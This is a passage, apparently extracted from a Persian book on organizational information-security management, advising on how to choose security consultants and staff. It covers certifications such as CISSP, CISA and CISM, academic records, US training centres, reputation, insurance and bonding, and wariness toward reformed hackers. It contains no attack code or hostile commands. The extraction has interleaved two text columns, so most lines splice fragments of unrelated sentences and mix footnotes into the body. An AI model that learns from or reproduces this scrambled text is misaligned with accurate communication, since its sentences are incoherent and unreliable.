‫ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻳـﺎ ﻛﻼﺳـﻬﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺷـﺮﻛﺖ ﻛﻨـﺪ‪،‬‬
‫ﻣﻄﺎﻟﺐ ﺗﺌﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ‪ ،‬ﻭ ﺳﺆﺍﻻﺕ‬ ‫ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺍﺑـﻂ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺗﺴﺘﻲ ﺭﺍ ﭘﺎﺳﺦ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﭼﻨﺪﺍﻥ ﺍﺭﺯﺷﻤﻨﺪ ﻧﻴـﺴﺘﻨﺪ‪.‬‬ ‫ﺩﺍﻧﺶ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺘﻌﺪﺍﺩﻫﺎﻱ ﺑـﻮﻣﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺗﺠﺎﺭﺏ ﻋﻤﻠﻲ ﻭ‬ ‫ﺍﻣﻜﺎﻥ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﺗﺨﺼﺺ ﻋﻤﻴﻘﺘﺮ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫﻨﻮﺯ ﻳﻚ ﺑﺤﺚ ﺩﺭﺣﺎﻝ ﺗﻜﺎﻣﻞ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺍﺯ ﺍﺷـﺎﺭﻩ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻓﻌﻠﻲ ﺁﻥ ﺍﻛﺮﺍﻩ ﺩﺍﺭﻳﻢ‪ ،‬ﺍﻣﺎ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺑﻪ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ‪ ١٠٦CISSP‬ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻫﺮﭼﻨـﺪ ﻫﻤـﺔ ﺁﻥ‬ ‫ﻣﻬﻤﺘــﺮ ﺍﺯ ﻫﻤــﻪ ﺑﺎﻳــﺪ ﺩﺭ ﻓﻜــﺮ ﺍﻓــﺮﺍﺩﻱ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺧــﺪﻣﺎﺕ‬
‫ﭼﻴﺰﻱ ﻧﻴﺴﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ‪ ،‬ﺍﻣﺎ ﻳﻚ ﻣﺪﺭﻙ ﻣﻌﺘﺒـﺮ‬ ‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﻣـﻲﺩﻫﻨـﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺳﻄﺤﻲ ﻣﻌﻴﻦ ﺍﺯ ﺗﺠﺮﺑﻪ ﻭ ﺗﺨﺼﺺ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ‬ ‫ﺑﺮ ﺧﻼﻑ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩﺍﻱ‪ ،‬ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﺎﻭﺭﻳﻨﻲ ﻛـﻪ‬
‫‪١٠٧‬‬ ‫ﺑﺮﺍﻱ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣـﺪﻩﺍﻧـﺪ ﺑﺎﻳـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺍﺳﺖ‪.‬‬
‫ﻣﺤﺘﺎﻃﺎﻧﻪ ﺭﻓﺘﺎﺭ ﻛﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻧﻴﺮﻭﻱ ﺧـﺎﺭﺟﻲ ﺑـﺮﺍﻱ‬
‫ﺗﺤﺼﻴﻼﺕ‬ ‫ﻻ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺳـﻄﻮﺣﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ‬
‫ﺳﻮﺍﺑﻖ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺧﻲ ﺍﻓـﺮﺍﺩ ﻣﻬـﺎﺭﺕ ﺑـﺎﻻﻱ‬ ‫ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻧﺘﻴﺠﺔ ﻣﻄﺎﻟﻌـﻪ ﻭ ﺗﺠﺮﺑـﺔ ﺷﺨـﺼﻲ ﺑﺪﺳـﺖ‬
‫ﻼ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﺎﻫ ﹺﺮ‬ ‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻗﺒ ﹰ‬
‫ﺁﻭﺭﺩﻩﺍﻧﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺩﺭﺑﺎﺭﺓ ﻋﻠﻮﻡ ﻭ ﻣﻬﻨﺪﺳﻲ ﺭﺍﻳﺎﻧـﻪ ﻣـﺪﺍﺭﻙ‬
‫ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﻤﺎ‬
‫ﺗﺤﺼﻴﻠﻲ ﻭ ﺩﺍﻧﺸﻜﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺑﺎﻭﺭ ﺟﻬﺎﻧﻲ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺎﻳﺪ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﻩﺍﻱ ﻛـﻪ‬
‫ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻣﻬﻤﺘﺮ ﺍﺯ ﻣﺪﺍﺭﻙ ﺍﺳﺖ‪ .‬ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺩﺭ ﺑﺨـﺶ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﺟﺎﻣﻊ ﻧﻴﺴﺖ‪ ،‬ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﺯ ﻋﻬـﺪﺓ ﻛﺎﺭﺗـﺎﻥ ﺑـﺮ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺍﺩﻋﺎﻫﺎﻱ ﻣﺘﻘﺎﺿـﻴﺎﻥ‬
‫ﻣﻲﺁﻳﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺗﺨـﺼﺺ ﺧـﻮﺩ ﺍﺩﻋﺎﻫـﺎﻱ‬
‫ﺑﺎ ﻣﺪﺍﺭﻛﺸﺎﻥ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳـﺎﻻﺕ‬
‫ﺩﺭﻭﻏﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﻛﻪ ﺗﺨﺼﺼﺸﺎﻥ ﺑـﻪ ﺁﻧﭽـﻪ ﺑـﺪﺍﻥ ﻧﻴـﺎﺯ‬
‫ﻣﺘﺤﺪﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺗﻌـﺪﺍﺩ ﻣﺤـﺪﻭﺩﻱ ﻣﺆﺳـﺴﺔ‬
‫ﺩﺍﺭﻳﺪ ﻧﺎﻣﺮﺑﻮﻁ ﺍﺳﺖ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﺧﺪﻣﺎﺕ ﻓﺮﺩ ﻳﺎ‬
‫ﺁﻣﻮﺯﺷﻲ ﺭﺍ ﺑﻌﻨﻮﺍﻥ "ﻗﻄﺒﻬﺎﻱ ﺁﻣﻮﺯﺷﻲ" ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﻃﺒﻖ‬
‫ﺷﺮﻛﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺧﻮﺩ ﺍﻋﺘﺮﺍﻑ ﻣﻲﻛﻨﻨﺪ "ﺩﺭ ﺧﻼﻝ ﻛـﺎﺭ‪،‬‬
‫ﺁﻥ ﻓﻬﺮﺳﺖ ﻃﺮﺣﻬﺎﻱ ﭘﻴـﺸﺮﻭﻱ ﻣﺆﺳـﺴﺔ ‪ infosec‬ﺩﺭ ﮊﻭﺋـﻦ‬
‫ﻳﺎﺩﮔﻴﺮﻱ ﻫﻢ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ" )ﻭ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻻ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﺟﻪ ﻛﻤﺘـﺮﻱ‬
‫‪ ۲۰۰۲‬ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺟﺮﺝ ﻣﻴـﺴﻮﻥ‪ ،١٠٨‬ﺟﻴﻤـﺰ ﻣﺪﻳـﺴﻮﻥ‪،١٠٩‬‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ(‪ ،‬ﺗﺎ ﺍﻳﻨﻜـﻪ ﻓـﺮﺩﻱ ﺍﺳـﺘﺨﺪﺍﻡ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﻼﺵ‬
‫ﺍﻳﺎﻟﺖ ﺍﻳﺪﺍﻫﻮ‪ ،١١٠‬ﺍﻳﺎﻟـﺖ ﺁﻳـﻮﺍ‪ ،١١١‬ﺁﻣﻮﺯﺷـﮕﺎﻩ ﻛﺎﺭﺷﻨﺎﺳـﻲ ﺍﺭﺷـﺪ‬
‫ﻣﻲﻛﻨﺪ ﻧﻘﺎﻳﺺ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻛﻨﺪ‪.‬‬
‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ‬
‫‪ ۱۰۶‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﭘﻮﺭﺗﺎﻝ ﻭﺏ ‪ CISSP‬ﺩﺭ‪:‬‬ ‫ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺑـﺴﺘﺮﻫﺎﻱ ‪ Windows‬ﺩﺭ ﺳـﻄﻮﺡ‬
‫‪http://www.cissps.com/‬‬
‫‪ ۱۰۷‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻳﺮ ﺩﺭ ﺁﺩﺭﺱ ‪ www.isaca.org‬ﺭﺍ ﻧﻴﺰ ﺑﺒﻴﻨﻴﺪ‪:‬‬ ‫ﻣﺨﺘﻠﻒ ﺗﺨﺼﺺ ﺩﺍﺭﻧـﺪ ﺍﺷـﺒﺎﻉ ﺷـﺪﻩ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ‬
‫)‪CISA (Certified Information Security Auditor‬‬ ‫ﺑﺴﺘﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺯ ﺟﻤﻠﻪ ‪ Unix‬ﻛﻤﺘﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﻛﺘﺎﺑﻬﺎ ﻣﻲﺗﻮﺍﻥ‬
‫‪CISM (Certified Information Security‬‬
‫)‪Manager‬‬ ‫ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺁﻣﻮﺧﺖ‪ ،‬ﺍﻣﺎ ﺗﻨﻬﺎ ﻣﻄﺎﻟﻌﺔ ﻛﺘﺎﺏ‬
‫‪108‬‬ ‫‪George Mason University‬‬
‫‪109‬‬ ‫‪James Medison University‬‬ ‫ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﻧﮕﺮﺍﻧـﻲ ﺩﺍﺭﻳـﺪ‬
‫‪110‬‬ ‫‪Idaho‬‬
‫‪111‬‬ ‫‪Iowa‬‬
‫‪١٧١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ‬ ‫ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻧﻴﺮﻭﻱ ﺩﺭﻳﺎﻳﻲ‪ ،‬ﺩﺍﻧﺸﮕﺎﻩ ﭘﻮﺭﺩﻭ‪ ،١١٢‬ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ‬
‫ﺩﺭ ﺩﻳﻮﻳﺲ‪ ،١١٣‬ﻭ ﺩﺍﻧﺸﮕﺎﻩ ﺍﻳﺪﺍﻫﻮ ﺍﺭﺍﺋﻪ ﺷﺪﻧﺪ‪ .‬ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬـﺎﻥ‬
‫ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﻛﺎﺭ ﺑﺎ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺩﻋﺎ ﻣـﻲﻛﻨﻨـﺪ‬
‫ﻣﺮﺍﻛﺰ ﻣﻘﺪﻣﺎﺗﻲ ﻓﺮﺍﻭﺍﻧـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‬
‫ﺩﺍﺭﻧﺪ‪ .‬ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ ﺧﻮﺩ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗـﺎ‬
‫ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ‪ ١١٤.‬ﺍﮔﺮﭼﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﺍﺭﺗﻜـﺎﺏ‬
‫ﻣﺮﺍﻛﺰ ﻣﺸﺎﺑﻬﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﺠﺎ ﻣﺴﺘﻘﺮ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﻴﺎﺑﻴﺪ‪.‬‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭﮔﻴﺮ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﻋﻀﻮ ﻣﻔﻴﺪﻱ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳﻜـﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺑﺨـﺶ‬
‫ﺍﺯ ﺟﺎﻣﻌﻪ ﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻪ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﺮﺗﻜﺐ ﺟﺮﺍﺋﻢ‬
‫ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﺋﻴﺪ‪.‬‬
‫ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺳﻮﺀ ﺳﺎﺑﻘﻪ ﺩﺍﺭﻧﺪ ﺧﻮﺵ ﺑﻴﻦ ﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻜﺎﺕ‬
‫ﺯﻳﺮ ﻗﺎﺑﻞ ﺍﺷﺎﺭﻩﺍﻧﺪ‪:‬‬ ‫ﺷﻬﺮﺕ‬
‫ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﺧﻮﺩ ﺳﺎﺑﻘﺔ ﺧﺪﺷﻪﺩﺍﺭ‬ ‫‪.۱‬‬ ‫ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﭘﺮﻛﺎﺭﺑﺮﺩ ﻧﻮﺷـﺘﻪ ﺑﺎﺷـﺪ ﻳـﺎ ﺩﺭ ﻳـﻚ‬
‫ﻛﺮﺩﻥ ﻗﺎﻧﻮﻥ‪ ،‬ﻣﺎﻟﻜﻴـﺖ ﺷﺨـﺼﻲ‪ ،‬ﻭ ﺣﻘـﻮﻕ ﺧـﺼﻮﺻﻲ‬ ‫ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺘﺎﺑﻲ ﺗـﺄﻟﻴﻒ ﻛـﺮﺩﻩ‬
‫ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺍﺭﻧﺪ ﺍﻧﺘﺨﺎﺏ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺭﺍﺋـﻲ ﻭ‬ ‫ﺑﺎﺷﺪ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺷﻨﺎﺳﺖ‪.‬‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﺣﺮﺍﺳـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ‬ ‫ﺑﺮﺧﻲ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺳﺎﺑﻘﺔ ﺯﻳﺎﺩﻱ ﺩﺭ ﺩﺍﻣﻨﺔ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣـﺴﺎﺋﻞ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺁﻳﺎ ﺷﻤﺎ ﺣﺎﺿﺮﻳﺪ ﺍﺯ ﻳﻚ ﻣﺠـﺮﻡ ﺳـﺎﺑﻘﻪﺩﺍﺭ ﺑـﺮﺍﻱ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺗﻨﻬﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﻭ ﻫﺸﺪﺍﺭ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷـﻬﺮﺕ ﺯﻳـﺎﺩ ﻟﺰﻭﻣـﹰﺎ ﺑـﻪ ﻣﻌﻨـﺎﻱ‬
‫ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺣﺎﺿﺮﻳﺪ ﻳﻚ ﺗﺒﻬﻜـﺎﺭ ﺍﺻـﻼﺡ ﺷـﺪﻩ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫ﺷﺎﻳﺴﺘﮕﻲ ﺑﺮﺍﻱ ﻣﺸﺎﻭﺭﻩ ﻧﻤﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﺩﺍﺭﺓ ﻣﺮﻛﺰ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﻭﻳﮋﺓ ﺷﺮﻛﺖ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ؟ ﺍﻳـﻦ‬
‫ﻣﻮﺍﺭﺩ ﺗﻨﻬـﺎ ﭘـﻴﺶﺑﻴﻨﻴﻬـﺎﻱ ﺑـﺪ ﻧﻴـﺴﺘﻨﺪ؛ ﺑﻠﻜـﻪ ﻫﺮﻳـﻚ‬
‫ﺑﻴﻤﻪ ﻭ ﺗﻌﻬﺪﻧﺎﻣﻪ‬
‫ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭ ﻛﻨﻨﺪ ﺑﭙﺮﺳـﻴﺪ ﻛـﻪ ﺁﻳـﺎ‬
‫ﺩﺭﺻــﻮﺭﺕ ﺑــﺮﻭﺯ ﺍﺷــﻜﺎﻝ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘــﺎﻱ ﺷــﻤﺎ ﺭﺍ ﺑــﻪ‬
‫ﺑﻴﻤﻪ ﻫﺴﺘﻨﺪ ﻭ ﺗﻌﻬﺪ ﺳﭙﺮﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﻳﻨﻜﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛـﻪ‬
‫ﺩﺍﺩﮔﺎﻫﻬﺎ ﻭ ﻣﺤﺎﻛﻢ ﻣﺪﻧﻲ ﺑﺎﺯ ﻛﻨﻨﺪ ‪ -‬ﺑﻪ ﻫـﺮ ﺣـﺎﻝ ﺍﻳـﻦ‬
‫ﺷﺮﻛﺖ ﺁﻧﻬﺎ ﺑﻪ ﺷﺎﻳﺴﺘﮕﻲ ﻭ ﺭﻓﺘﺎﺭ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻨﻜـﺎﺭ‬
‫ﺷﻤﺎ ﺑﻮﺩﻩﺍﻳﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﺳﺎﺑﻘﺔ ﺁﻧـﺎﻥ ﺗـﺼﻤﻴﻢ‬
‫ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨـﺪ ﻛـﻪ ﺁﻥ ﺳـﺎﺯﻣﺎﻥ ﻭﺍﺟـﺪ ﺷﺎﻳـﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ‬
‫ﺑﻪ ﺍﺳﺘﺨﺪﺍﻣﺸﺎﻥ ﮔﺮﻓﺘﻪﺍﻳﺪ‪.‬‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻧﻮﻋﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺁﻥ ﺳـﻮﺀ‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﻧﺠـﺎﻡ‬ ‫‪.۲‬‬ ‫ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﻣﺼﺎﺣﺒﻪ ﺑﺎ ﺷﻤﺎ ﺍﺯ ﺍﺭﺍﺋﻪ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ‬
‫ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ‪ .‬ﺷﺎﻳﺪ ﺁﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺩﺭ ﻭﺭﻭﺩ ﺑﻪ ﺑﺪﻧـﺔ‬ ‫ﺭﺍﺑﻄﻪﻫﺎ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺗﻤـﺎﺱ ﺗﻠﻔﻨـﻲ ﺧﺒـﺮﻩ‬ ‫ﺍﺯ ﺍﻓــﺮﺍﺩ ﺑﭙﺮﺳــﻴﺪ ﻛــﻪ ﺩﺭ ﻛــﺪﺍﻡ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺤﻠــﻲ‪ ،‬ﻣﻠــﻲ ﻭ‬
